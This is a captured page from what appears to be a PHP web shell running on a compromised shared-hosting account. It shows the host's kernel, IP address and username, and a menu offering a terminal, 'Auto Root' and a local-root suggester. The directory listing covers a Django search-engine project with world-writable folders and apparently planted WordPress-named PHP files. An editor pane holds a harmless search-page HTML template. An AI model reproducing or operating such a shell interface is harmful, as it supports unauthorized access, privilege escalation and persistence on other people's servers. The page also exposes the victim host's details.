Linux premium242.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.146.154 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : tukiwyzk
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
tukiwyzk /
helpgaza /
Delete
Unzip
Name
Size
Permission
Date
Action
-p
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
customsearch
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
mysearchengine
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
public
[ DIR ]
drwxr-xr-x
2025-10-17 07:59
searchapp
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
static
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
staticfiles
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
templates
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
test_data
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
tmp
[ DIR ]
drwxr-xr-x
2025-10-17 07:59
venv
[ DIR ]
drwxrwxrwx
2025-10-17 07:59
.htaccess
197
B
-r--r--r--
2025-10-17 07:59
DEPLOYMENT_GUIDE.md
4.68
KB
-rw-rw-rw-
2025-08-23 14:13
LOCAL_TESTING_GUIDE.md
4.57
KB
-rw-rw-rw-
2025-08-23 14:16
TODO.md
1.42
KB
-rw-rw-rw-
2025-08-23 16:07
backend_test_log.txt
41
B
-rw-rw-rw-
2025-08-23 16:04
base.html
2.5
KB
-rw-rw-rw-
2025-08-23 15:21
db.sqlite3
132
KB
-rw-rw-rw-
2025-08-23 14:24
deploy.sh
3.45
KB
-rw-rw-rw-
2025-08-23 14:12
final_test.py
1.69
KB
-rw-rw-rw-
2025-08-23 14:44
gunicorn.service
323
B
-rw-rw-rw-
2025-08-23 14:11
import_data.py
1.5
KB
-rw-rw-rw-
2025-08-23 14:10
local_setup.py
4.93
KB
-rw-rw-rw-
2025-08-23 14:15
manage.py
670
B
-rw-rw-rw-
2025-08-23 14:23
nginx_config.conf
2.08
KB
-rw-rw-rw-
2025-08-23 14:11
passenger_wsgi.py
66
B
-rw-r--r--
2025-08-23 16:59
performance_results.txt
539
B
-rw-rw-rw-
2025-08-23 16:06
performance_test.py
1.54
KB
-rw-rw-rw-
2025-08-23 16:05
requirements.txt
131
B
-rw-rw-rw-
2025-08-23 16:45
run_local.sh
1014
B
-rw-rw-rw-
2025-08-23 14:17
setup_mysql.sql
214
B
-rw-rw-rw-
2025-08-23 14:10
stderr.log
85.13
KB
-rw-r--r--
2025-12-09 11:53
test_backend.py
989
B
-rw-rw-rw-
2025-08-23 14:29
test_backend_fixed.py
1.2
KB
-rw-rw-rw-
2025-08-23 14:31
test_backend_with_log.py
1.13
KB
-rw-rw-rw-
2025-08-23 14:30
test_complete.py
2.41
KB
-rw-rw-rw-
2025-08-23 14:34
test_results.txt
406
B
-rw-rw-rw-
2025-08-23 14:45
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-10-17 07:59
wp-cron.php
2.73
KB
-rw-r--r--
2025-10-17 07:59
Save
Rename
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>My Search Engine</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin: 50px; background-color: #f4f4f4; } .logo { margin-bottom: 20px; } .sentence { margin: 10px 0; color: #555; } .search-form { margin: 30px auto; width: 100%; max-width: 584px; } .search-input { width: 100%; padding: 14px; font-size: 16px; border: 1px solid #dfe1e5; border-radius: 24px; outline: none; box-sizing: border-box; } .search-input:hover, .search-input:focus { box-shadow: 0 1px 6px rgba(32, 33, 36, 0.28); border-color: rgba(223, 225, 229, 0); } .search-button { background-color: #f8f9fa; border: 1px solid #f8f9fa; border-radius: 4px; color: #3c4043; font-size: 14px; padding: 10px 16px; margin: 30px 4px; cursor: pointer; } .search-button:hover { box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1); background-color: #f8f9fa; border: 1px solid #dadce0; color: #202124; } .cookie-notice { font-size: 10px; color: #70757a; margin-top: 30px; } </style> </head> <body> <!-- Image at the top center --> <div class="logo"> <img src="muimg.jpeg" height="100"> </div> <!-- Three sentences below the image --> <div class="sentence">Welcome to the custom search engine.</div> <div class="sentence">Find what you need quickly and easily.</div> <div class="sentence">Privacy and simplicity are our priorities.</div> <!-- Search field --> <form class="search-form" action="/search" method="GET"> <input class="search-input" type="text" name="q" placeholder="Enter your search terms..." required> <br> <!-- Search button --> <input class="search-button" type="submit" value="Start Search"> </form> <!-- Small text field for cookies notice --> <div class="cookie-notice"> This site uses technically necessary cookies to function. </div> </body> </html>